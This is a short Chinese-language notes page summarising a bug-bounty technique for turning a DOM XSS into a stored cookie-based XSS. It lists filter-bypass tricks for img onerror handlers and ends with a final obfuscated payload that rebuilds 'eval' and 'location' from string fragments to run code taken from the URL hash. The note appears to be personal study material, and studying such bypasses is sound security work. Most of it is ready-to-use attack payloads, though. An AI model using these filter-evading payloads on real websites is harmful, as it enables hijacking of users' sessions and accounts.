随手记

一、【$500】如何将DOM XSS升级为存储型XSS

  1. <img/src/onerror=> 被拦截,<img/src/onerror %09=> bypass

  2. <img src onerror %09=**alert**>被拦截,<img src onerror %09=top> bypass

  3. 检查基于Cookie的存储型XSS。

    1. 使用 Burp 的 DOM Invader 来查找 DOM XSS,并将 DOM Invader Canary粘贴到浏览器中的所有 Cookie 中,当重新加载页面时,发现 DOM Invader 再次变为红色。
    2. 一个 Cookie 确实反映在了 DOM 中!这意味着可以将 DOM XSS 转换为存储 Cookie XSS,我们所需要做的就是使用 DOM XSS 向 Cookie 中注入 XSS,并在每次用户导航到该位置时执行它。
  4. 最终Payload:

    <img/src/onerror %09=testing%3dtop['ev'+'al'];foundit=top['loca'+'tion']['hash']><img/src/onerror=testing(decodeURI(foundit.substr(1)))>
    

周末待看

一周总结